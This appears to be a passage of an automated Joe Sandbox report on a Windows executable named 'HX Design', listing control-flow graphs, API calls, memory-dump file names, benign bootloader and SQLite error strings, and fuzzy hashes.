                                                                                                                                                                                                                                                      control_flow_graph 1199 7ff732061210-7ff73206126d call 7ff73206bd80 1202 7ff732061297-7ff7320612af call 7ff732074f44 1199->1202 1203 7ff73206126f-7ff732061296 call 7ff732062710 1199->1203 1208 7ff7320612d4-7ff7320612e4 call 7ff732074f44 1202->1208 1209 7ff7320612b1-7ff7320612cf call 7ff732074f08 call 7ff732062910 1202->1209 1214 7ff732061309-7ff73206131b 1208->1214 1215 7ff7320612e6-7ff732061304 call 7ff732074f08 call 7ff732062910 1208->1215 1222 7ff732061439-7ff73206146d call 7ff73206ba60 call 7ff732074f30 * 2 1209->1222 1218 7ff732061320-7ff732061345 call 7ff73207039c 1214->1218 1215->1222 1228 7ff73206134b-7ff732061355 call 7ff732070110 1218->1228 1229 7ff732061431 1218->1229 1228->1229 1235 7ff73206135b-7ff732061367 1228->1235 1229->1222 1237 7ff732061370-7ff732061398 call 7ff73206a1c0 1235->1237 1240 7ff73206139a-7ff73206139d 1237->1240 1241 7ff732061416-7ff73206142c call 7ff732062710 1237->1241 1242 7ff73206139f-7ff7320613a9 1240->1242 1243 7ff732061411 1240->1243 1241->1229 1245 7ff7320613ab-7ff7320613b9 call 7ff732070adc 1242->1245 1246 7ff7320613d4-7ff7320613d7 1242->1246 1243->1241 1250 7ff7320613be-7ff7320613c1 1245->1250 1248 7ff7320613ea-7ff7320613ef 1246->1248 1249 7ff7320613d9-7ff7320613e7 call 7ff732089e30 1246->1249 1248->1237 1252 7ff7320613f5-7ff7320613f8 1248->1252 1249->1248 1255 7ff7320613c3-7ff7320613cd call 7ff732070110 1250->1255 1256 7ff7320613cf-7ff7320613d2 1250->1256 1253 7ff73206140c-7ff73206140f 1252->1253 1254 7ff7320613fa-7ff7320613fd 1252->1254 1253->1229 1254->1241 1258 7ff7320613ff-7ff732061407 1254->1258 1255->1248 1255->1256 1256->1241 1258->1218
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                      • Opcode ID: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                                      • Instruction ID: 7ba33010c38cec13a7fd246382fb8c393174fd09f7c6121060df5aca34d75fb0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4176682b56444a78b74e0a45c684f191b40491c6c63e868bb09f8baa48a37ad0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A510B22B0864265EA20BB15E4403BAE391FF84B94FC84131ED8D47BD5EFBCE549E724

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF732063804), ref: 00007FF7320636E1
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF732063804), ref: 00007FF7320636EB
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
                                                                                                                                                                                                                                                        • Part of subcall function 00007FF732062C50: MessageBoxW.USER32 ref: 00007FF732062D99
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                      • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                      • Instruction ID: b618fc54f69114c14a619e3fe3a4bbddf1446a396af661121fa170e6144b99cd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD219561B1864261FA30B724EC543BAE2A0FF88754FC00232D65D825D5EEACE50DE768

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1360 7ff73207ba5c-7ff73207ba82 1361 7ff73207ba9d-7ff73207baa1 1360->1361 1362 7ff73207ba84-7ff73207ba98 call 7ff732074ee8 call 7ff732074f08 1360->1362 1364 7ff73207be77-7ff73207be83 call 7ff732074ee8 call 7ff732074f08 1361->1364 1365 7ff73207baa7-7ff73207baae 1361->1365 1378 7ff73207be8e 1362->1378 1384 7ff73207be89 call 7ff73207a8e0 1364->1384 1365->1364 1367 7ff73207bab4-7ff73207bae2 1365->1367 1367->1364 1370 7ff73207bae8-7ff73207baef 1367->1370 1373 7ff73207bb08-7ff73207bb0b 1370->1373 1374 7ff73207baf1-7ff73207bb03 call 7ff732074ee8 call 7ff732074f08 1370->1374 1376 7ff73207be73-7ff73207be75 1373->1376 1377 7ff73207bb11-7ff73207bb17 1373->1377 1374->1384 1381 7ff73207be91-7ff73207bea8 1376->1381 1377->1376 1382 7ff73207bb1d-7ff73207bb20 1377->1382 1378->1381 1382->1374 1386 7ff73207bb22-7ff73207bb47 1382->1386 1384->1378 1389 7ff73207bb7a-7ff73207bb81 1386->1389 1390 7ff73207bb49-7ff73207bb4b 1386->1390 1391 7ff73207bb56-7ff73207bb6d call 7ff732074ee8 call 7ff732074f08 call 7ff73207a8e0 1389->1391 1392 7ff73207bb83-7ff73207bbab call 7ff73207d5fc call 7ff73207a948 * 2 1389->1392 1393 7ff73207bb4d-7ff73207bb54 1390->1393 1394 7ff73207bb72-7ff73207bb78 1390->1394 1426 7ff73207bd00 1391->1426 1421 7ff73207bbad-7ff73207bbc3 call 7ff732074f08 call 7ff732074ee8 1392->1421 1422 7ff73207bbc8-7ff73207bbf3 call 7ff73207c284 1392->1422 1393->1391 1393->1394 1397 7ff73207bbf8-7ff73207bc0f 1394->1397 1398 7ff73207bc8a-7ff73207bc94 call 7ff73208391c 1397->1398 1399 7ff73207bc11-7ff73207bc19 1397->1399 1412 7ff73207bd1e 1398->1412 1413 7ff73207bc9a-7ff73207bcaf 1398->1413 1399->1398 1402 7ff73207bc1b-7ff73207bc1d 1399->1402 1402->1398 1406 7ff73207bc1f-7ff73207bc35 1402->1406 1406->1398 1410 7ff73207bc37-7ff73207bc43 1406->1410 1410->1398 1415 7ff73207bc45-7ff73207bc47 1410->1415 1417 7ff73207bd23-7ff73207bd43 ReadFile 1412->1417 1413->1412 1418 7ff73207bcb1-7ff73207bcc3 GetConsoleMode 1413->1418 1415->1398 1420 7ff73207bc49-7ff73207bc61 1415->1420 1423 7ff73207be3d-7ff73207be46 GetLastError 1417->1423 1424 7ff73207bd49-7ff73207bd51 1417->1424 1418->1412 1425 7ff73207bcc5-7ff73207bccd 1418->1425 1420->1398 1430 7ff73207bc63-7ff73207bc6f 1420->1430 1421->1426 1422->1397 1427 7ff73207be48-7ff73207be5e call 7ff732074f08 call 7ff732074ee8 1423->1427 1428 7ff73207be63-7ff73207be66 1423->1428 1424->1423 1432 7ff73207bd57 1424->1432 1425->1417 1434 7ff73207bccf-7ff73207bcf1 ReadConsoleW 1425->1434 1429 7ff73207bd03-7ff73207bd0d call 7ff73207a948 1426->1429 1427->1426 1440 7ff73207be6c-7ff73207be6e 1428->1440 1441 7ff73207bcf9-7ff73207bcfb call 7ff732074e7c 1428->1441 1429->1381 1430->1398 1439 7ff73207bc71-7ff73207bc73 1430->1439 1443 7ff73207bd5e-7ff73207bd73 1432->1443 1435 7ff73207bcf3 GetLastError 1434->1435 1436 7ff73207bd12-7ff73207bd1c 1434->1436 1435->1441 1436->1443 1439->1398 1448 7ff73207bc75-7ff73207bc85 1439->1448 1440->1429 1441->1426 1443->1429 1450 7ff73207bd75-7ff73207bd80 1443->1450 1448->1398 1453 7ff73207bda7-7ff73207bdaf 1450->1453 1454 7ff73207bd82-7ff73207bd9b call 7ff73207b674 1450->1454 1455 7ff73207be2b-7ff73207be38 call 7ff73207b4b4 1453->1455 1456 7ff73207bdb1-7ff73207bdc3 1453->1456 1459 7ff73207bda0-7ff73207bda2 1454->1459 1455->1459 1460 7ff73207be1e-7ff73207be26 1456->1460 1461 7ff73207bdc5 1456->1461 1459->1429 1460->1429 1464 7ff73207bdca-7ff73207bdd1 1461->1464 1465 7ff73207be0d-7ff73207be18 1464->1465 1466 7ff73207bdd3-7ff73207bdd7 1464->1466 1465->1460 1467 7ff73207bdd9-7ff73207bde0 1466->1467 1468 7ff73207bdf3 1466->1468 1467->1468 1469 7ff73207bde2-7ff73207bde6 1467->1469 1470 7ff73207bdf9-7ff73207be09 1468->1470 1469->1468 1471 7ff73207bde8-7ff73207bdf1 1469->1471 1470->1464 1472 7ff73207be0b 1470->1472 1471->1470 1472->1460
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                                      • Opcode ID: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                      • Instruction ID: 4a19d13d763459d487f822cfd77626a00406124f9568a92944f9add027675a12
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe76644ed600cf537c3c6f178a4f6dddc7bb94aee2e0e4a7e52e493d4ee37ba5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EBC1D82290C686A2E760BB1994402BEF760FB85B90FD54131EA4E07791DFFCE85DE720

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                      • Opcode ID: 6bfffda2f71952109638076ae884e7e5d57c5dcfa62dc35d578edba97c4b3a9f
                                                                                                                                                                                                                                                      • Instruction ID: 967bf6b8a112f732990a34582b8cf334438acd789e15bc2b29f74f267c1dd47d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bfffda2f71952109638076ae884e7e5d57c5dcfa62dc35d578edba97c4b3a9f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7416021B19A86B1EA25FB20E4542EEA361FF44344FC00132EA5D43699EFBCE51DD764

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 1730 7ffdfb2effd0-7ffdfb2f001c 1731 7ffdfb2f0021-7ffdfb2f0094 1730->1731 1732 7ffdfb2f00bb-7ffdfb2f00cb call 7ffdfb2ed020 1731->1732 1733 7ffdfb2f0096-7ffdfb2f00a5 call 7ffdfb2efa10 1731->1733 1738 7ffdfb2f00d1-7ffdfb2f00fa 1732->1738 1739 7ffdfb2f05d2-7ffdfb2f05d5 1732->1739 1740 7ffdfb2f00ab-7ffdfb2f00b6 1733->1740 1741 7ffdfb2f0637-7ffdfb2f065a call 7ffdfb412900 1733->1741 1742 7ffdfb2f0100-7ffdfb2f0115 1738->1742 1743 7ffdfb2f05d7-7ffdfb2f05de 1739->1743 1744 7ffdfb2f0632 1739->1744 1740->1732 1752 7ffdfb2f0117-7ffdfb2f0123 1742->1752 1753 7ffdfb2f0152-7ffdfb2f015c 1742->1753 1746 7ffdfb2f0629 1743->1746 1747 7ffdfb2f05e0-7ffdfb2f05ea 1743->1747 1744->1741 1746->1744 1750 7ffdfb2f05ec 1747->1750 1751 7ffdfb2f05f2-7ffdfb2f061f 1747->1751 1750->1751 1751->1744 1771 7ffdfb2f0621-7ffdfb2f0627 1751->1771 1754 7ffdfb2f0166-7ffdfb2f0181 1752->1754 1762 7ffdfb2f0125-7ffdfb2f012b 1752->1762 1753->1754 1755 7ffdfb2f015e-7ffdfb2f0160 1753->1755 1758 7ffdfb2f018a-7ffdfb2f0193 1754->1758 1759 7ffdfb2f0183-7ffdfb2f0188 1754->1759 1755->1754 1757 7ffdfb2f03a8-7ffdfb2f03af 1755->1757 1764 7ffdfb2f03fa 1757->1764 1765 7ffdfb2f03b1-7ffdfb2f03bb 1757->1765 1761 7ffdfb2f0196-7ffdfb2f01aa call 7ffdfb3a6ad0 1758->1761 1759->1761 1777 7ffdfb2f01ac-7ffdfb2f01c6 call 7ffdfb35df90 1761->1777 1778 7ffdfb2f01c8 1761->1778 1769 7ffdfb2f0133-7ffdfb2f0136 1762->1769 1770 7ffdfb2f012d-7ffdfb2f0131 1762->1770 1775 7ffdfb2f0403 1764->1775 1766 7ffdfb2f03c3-7ffdfb2f03f0 1765->1766 1767 7ffdfb2f03bd 1765->1767 1779 7ffdfb2f040a-7ffdfb2f040d 1766->1779 1793 7ffdfb2f03f2-7ffdfb2f03f8 1766->1793 1767->1766 1773 7ffdfb2f013f-7ffdfb2f0150 1769->1773 1774 7ffdfb2f0138-7ffdfb2f013d 1769->1774 1770->1769 1770->1773 1771->1744 1773->1742 1774->1754 1774->1773 1775->1779 1782 7ffdfb2f01ca-7ffdfb2f01ec 1777->1782 1778->1782 1783 7ffdfb2f046b-7ffdfb2f0470 1779->1783 1784 7ffdfb2f040f-7ffdfb2f0416 1779->1784 1788 7ffdfb2f01f0-7ffdfb2f0217 CreateFileW 1782->1788 1783->1741 1789 7ffdfb2f0418-7ffdfb2f041b 1784->1789 1790 7ffdfb2f0462 1784->1790 1794 7ffdfb2f02c0 1788->1794 1795 7ffdfb2f021d-7ffdfb2f021f 1788->1795 1791 7ffdfb2f0423-7ffdfb2f0450 1789->1791 1792 7ffdfb2f041d 1789->1792 1790->1783 1791->1783 1820 7ffdfb2f0452-7ffdfb2f045d 1791->1820 1792->1791 1793->1775 1796 7ffdfb2f02c4-7ffdfb2f02c7 1794->1796 1797 7ffdfb2f0221-7ffdfb2f0233 1795->1797 1798 7ffdfb2f026f-7ffdfb2f027c 1795->1798 1802 7ffdfb2f02c9-7ffdfb2f02f2 call 7ffdfb2e9340 1796->1802 1803 7ffdfb2f02f7-7ffdfb2f02fb 1796->1803 1799 7ffdfb2f0237-7ffdfb2f025d call 7ffdfb2f0800 1797->1799 1800 7ffdfb2f0235 1797->1800 1815 7ffdfb2f02bc-7ffdfb2f02be 1798->1815 1816 7ffdfb2f027e-7ffdfb2f0284 1798->1816 1818 7ffdfb2f0261-7ffdfb2f0263 1799->1818 1819 7ffdfb2f025f 1799->1819 1800->1799 1802->1803 1807 7ffdfb2f0301-7ffdfb2f0311 call 7ffdfb2e6320 1803->1807 1808 7ffdfb2f04af-7ffdfb2f04bd 1803->1808 1829 7ffdfb2f0313-7ffdfb2f031a 1807->1829 1830 7ffdfb2f036e-7ffdfb2f0373 1807->1830 1810 7ffdfb2f04bf-7ffdfb2f04cb 1808->1810 1811 7ffdfb2f04cd-7ffdfb2f04e6 call 7ffdfb2e6320 1808->1811 1810->1811 1831 7ffdfb2f04e8-7ffdfb2f04ef 1811->1831 1832 7ffdfb2f0543-7ffdfb2f0546 1811->1832 1815->1796 1822 7ffdfb2f0296-7ffdfb2f0299 1816->1822 1823 7ffdfb2f0286-7ffdfb2f0294 1816->1823 1827 7ffdfb2f026b 1818->1827 1828 7ffdfb2f0265-7ffdfb2f0269 1818->1828 1819->1818 1820->1741 1824 7ffdfb2f029b-7ffdfb2f02a0 1822->1824 1825 7ffdfb2f02a2-7ffdfb2f02b7 1822->1825 1823->1822 1823->1825 1824->1815 1824->1825 1825->1788 1827->1798 1828->1794 1828->1827 1836 7ffdfb2f031c-7ffdfb2f0326 1829->1836 1837 7ffdfb2f0365 1829->1837 1834 7ffdfb2f0379-7ffdfb2f037e 1830->1834 1835 7ffdfb2f0475-7ffdfb2f04aa call 7ffdfb2ed810 call 7ffdfb3a5ae0 1830->1835 1841 7ffdfb2f053a 1831->1841 1842 7ffdfb2f04f1-7ffdfb2f04fb 1831->1842 1839 7ffdfb2f0548-7ffdfb2f054b 1832->1839 1840 7ffdfb2f054d 1832->1840 1834->1835 1843 7ffdfb2f0384-7ffdfb2f03a3 1834->1843 1835->1741 1845 7ffdfb2f0328 1836->1845 1846 7ffdfb2f032e-7ffdfb2f035b 1836->1846 1837->1830 1847 7ffdfb2f0554-7ffdfb2f056c 1839->1847 1840->1847 1841->1832 1848 7ffdfb2f0503-7ffdfb2f0530 1842->1848 1849 7ffdfb2f04fd 1842->1849 1843->1731 1845->1846 1846->1830 1861 7ffdfb2f035d-7ffdfb2f0363 1846->1861 1853 7ffdfb2f0572-7ffdfb2f057a 1847->1853 1854 7ffdfb2f056e 1847->1854 1848->1832 1864 7ffdfb2f0532-7ffdfb2f0538 1848->1864 1849->1848 1856 7ffdfb2f057c-7ffdfb2f0590 call 7ffdfb3a6ad0 1853->1856 1857 7ffdfb2f05aa-7ffdfb2f05d0 1853->1857 1854->1853 1865 7ffdfb2f05a6 1856->1865 1866 7ffdfb2f0592-7ffdfb2f05a4 call 7ffdfb35df90 1856->1866 1857->1741 1861->1830 1864->1832 1865->1857 1866->1857 1866->1865
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                                      • String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                      • API String ID: 823142352-3829269058
                                                                                                                                                                                                                                                      • Opcode ID: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                                      • Instruction ID: a559c89c79a5ebe649409a3b14b56aa70fa90c39468121af52fe987c000fd7cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fa68a4d019e543b82f48475598e9f337480dd6f5aee3ec3198131acb147343e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E027E21B0A683C6FB658F61A964B7A77A0FF84B58F044235DD6E826F8CF3CE5558700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                      • Instruction ID: 4bb68b1999a5f0fd7d390b880599b61f40378b254580015dbdf67592ec937396
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93516C72F04211A6FB14FF68D8596BCA7B1AF40358F900236DD2E52AE5DF7CA40AD710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2780335769-0
                                                                                                                                                                                                                                                      • Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                                      • Instruction ID: b1d3085229a13e1b89190dbefc57157f28a68d0ee3fa6b06382b4c94098d03a0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29519E22E086419AFB50FFB4D4503BDBBA1AB48B58F908435DE0D57A89DFB8D449D320
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                      • String ID:
